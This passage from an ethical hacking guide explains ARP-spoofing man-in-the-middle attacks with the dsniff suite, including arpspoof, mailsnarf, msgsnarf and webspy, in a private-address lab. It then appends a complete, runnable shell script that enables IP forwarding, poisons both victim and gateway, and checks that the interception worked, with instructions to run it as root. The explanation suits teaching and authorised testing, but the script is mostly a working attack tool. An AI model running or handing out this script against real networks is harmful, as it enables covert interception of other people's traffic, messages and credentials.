Ethical Hacking and Penetration Testing Guide




Tools of the Trade
Now, let's look at some of the popular tools that can be used to perform man-in-the-middle 
attacks.
Dsniff
Dsniff is often called the Swiss army knife of command-line sniffing and ARP spoofing tools. It is a 
collection of utilities for sniffing various types of traffic; the most popular of them, arpspoof, is 
demonstrated next. Dsniff is no longer actively developed, but the tools still work and are well 
suited to performing man-in-the-middle attacks.
The suite includes the following:

arpspoof - poisons a host's ARP cache by sending it forged ARP replies

mailsnarf - sniffs e-mail messages carried over protocols such as SMTP and POP

msgsnarf - sniffs instant-messaging conversations

webspy - sniffs the URLs a victim visits in his browser and immediately opens each one in our 
own browser, so we see the victim's browsing as it happens

urlsnarf - logs every HTTP request it sees as a URL, in Common Log Format

macof - floods a switch with frames from random MAC addresses (a MAC flooding attack)
Using ARP Spoof to Perform MITM Attacks
Before we perform a man-in-the-middle attack, we need to enable IP forwarding so that the traffic 
we intercept is passed on to its real destination instead of being dropped; without it, the victim's 
connection simply breaks. To enable it, we use the following command (as root):
echo 1 > /proc/sys/net/ipv4/ip_forward
We can confirm that IP forwarding is enabled by using the cat command to display the contents 
of the ip_forward file: "1" means that IP forwarding is enabled, "0" means it is disabled. This 
setting does not survive a reboot, so check it again each time the machine is restarted.
Now that we have enabled IP forwarding, we need to gather the following information to 
perform a man-in-the-middle attack:
1. Attacker’s IP
2. Victim’s IP
3. Default gateway
Attacker's IP
This will be the IP address of my BackTrack machine, which is 192.168.75.138.
Victim's IP
My victim is a Windows XP machine, which has the IP address 192.168.75.142.
Default gateway
The default gateway is the IP address of my router, which is 192.168.75.2.
Next, we note the MAC address associated with each of these IP addresses. We can view them 
in the attacker's ARP cache, which already holds the MAC addresses of the default gateway 
(192.168.75.2) and of our own machine (192.168.75.138). What we want to do is tell the 
default gateway that the victim's IP address is associated with our MAC address, and tell the 
victim that the gateway's IP address is associated with our MAC address. Let's use arpspoof 
to do this job.
Usage
The basic syntax for arpspoof is as follows:
arpspoof -i [interface] -t [target] [host]
Here target is the machine whose ARP cache we poison and host is the address we claim to be. 
In this case, our interface is eth0, the gateway is 192.168.75.2 and the victim is 
192.168.75.142, so our command is as follows:
arpspoof -i eth0 -t 192.168.75.142 192.168.75.2
On checking the victim's ARP cache again, we find that the gateway's entry now carries our 
MAC address. So anything that the victim sends to the gateway will be delivered to us 
instead.
We also need to issue the same command in the reverse direction: to sit in the middle we have 
to poison both sides, so the gateway must also learn that the victim's IP address belongs to our 
MAC address.
arpspoof -i eth0 -t 192.168.75.2 192.168.75.142
If we now look at the victim's ARP cache, the gateway's IP address maps to our MAC address, and 
the gateway's ARP cache likewise maps the victim's IP address to our MAC address. With IP 
forwarding enabled, traffic in both directions now passes through our machine.
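The whole procedure above (enable forwarding, sanity-check the addresses, poison both directions, confirm the effect in the victim's ARP cache) as one POSIX shell script. This is an added example, not code from the book or from the dsniff project. The interface eth0 and the addresses 192.168.75.142 (victim) and 192.168.75.2 (gateway) are the lab values used above; the helper names (is_ipv4, check_targets, enable_ip_forward, arpspoof_cmds, cached_mac, poisoned, run_mitm) are my own; and the arp -a text that cached_mac parses is assumed to be Windows-format output pasted from the victim machine.

```shell
#!/bin/sh
# Added example (not from the book): the arpspoof man-in-the-middle procedure as a script.
# Assumed lab values, overridable from the environment.
IFACE="${IFACE:-eth0}"
VICTIM="${VICTIM:-192.168.75.142}"
GATEWAY="${GATEWAY:-192.168.75.2}"
IP_FORWARD_FILE="${IP_FORWARD_FILE:-/proc/sys/net/ipv4/ip_forward}"

# Shape-check a dotted quad: exactly four decimal octets, each 0-255.
is_ipv4() {
  _ip=$1; _oldifs=$IFS; IFS=.
  set -- $_ip
  IFS=$_oldifs
  [ $# -eq 4 ] || return 1
  for _o in "$@"; do
    case "$_o" in ''|*[!0-9]*) return 1 ;; esac
    [ "$_o" -le 255 ] || return 1
  done
  return 0
}

# Victim and gateway must both be valid and must differ; with identical addresses
# arpspoof would be told to lie to a host about its own address and nothing is intercepted.
check_targets() {
  is_ipv4 "$1" && is_ipv4 "$2" && [ "$1" != "$2" ]
}

# Succeeds when the kernel forwarding flag reads "1" (the cat check from the text).
ip_forward_enabled() {
  [ "$(cat "${1:-$IP_FORWARD_FILE}")" = "1" ]
}

# echo 1 > /proc/sys/net/ipv4/ip_forward, then read it back to confirm. Needs root.
enable_ip_forward() {
  _f=${1:-$IP_FORWARD_FILE}
  ip_forward_enabled "$_f" || echo 1 > "$_f"
  ip_forward_enabled "$_f"
}

# The two command lines: tell VICTIM that GATEWAY is at our MAC, and tell GATEWAY
# that VICTIM is at our MAC. Printed rather than run so they can be reviewed first.
arpspoof_cmds() {
  printf 'arpspoof -i %s -t %s %s\n' "$IFACE" "$VICTIM" "$GATEWAY"
  printf 'arpspoof -i %s -t %s %s\n' "$IFACE" "$GATEWAY" "$VICTIM"
}

# Reads Windows-style `arp -a` output on stdin and prints the MAC the victim holds
# for IP $1, normalised to lower-case colon form (empty if the IP is not cached).
cached_mac() {
  awk -v ip="$1" '$1 == ip { print tolower($2) }' | tr '-' ':'
}

# Does the victim's cache (stdin) map IP $1 to our MAC $2? Confirms the poisoning took.
poisoned() {
  _seen=$(cached_mac "$1")
  _ours=$(printf '%s' "$2" | tr 'ABCDEF-' 'abcdef:')
  [ -n "$_seen" ] && [ "$_seen" = "$_ours" ]
}

run_mitm() {
  check_targets "$VICTIM" "$GATEWAY" || { echo "refusing: bad victim/gateway pair" >&2; return 1; }
  enable_ip_forward || { echo "could not enable IP forwarding (run as root)" >&2; return 1; }
  # One arpspoof per direction, as in the text. (Debian/Kali builds of dsniff 2.4 also
  # accept -r to poison both hosts from a single process; the effect is the same.)
  arpspoof -i "$IFACE" -t "$VICTIM" "$GATEWAY" & _p1=$!
  arpspoof -i "$IFACE" -t "$GATEWAY" "$VICTIM" & _p2=$!
  # Stop with SIGINT, never SIGKILL: on SIGINT arpspoof re-ARPs the real hardware
  # addresses, so victim and gateway recover without waiting for their caches to expire.
  trap 'kill -INT $_p1 $_p2 2>/dev/null' INT TERM
  wait
}

# Guarded so the file can be sourced for its checks without touching the network.
if [ "${1:-}" = "run" ]; then
  run_mitm
fi
```

Run it as root with `sh mitm.sh run` (hypothetical filename) to start the attack; sourcing it or running it without the argument only defines the functions. To confirm the poisoning from the victim's side, paste its `arp -a` output into `poisoned 192.168.75.2 <our MAC>`; on the attacker's side, `tcpdump -i eth0 host 192.168.75.142` showing the victim's traffic is the equivalent check. Stop the attack with Ctrl-C so both arpspoof processes restore the real ARP entries.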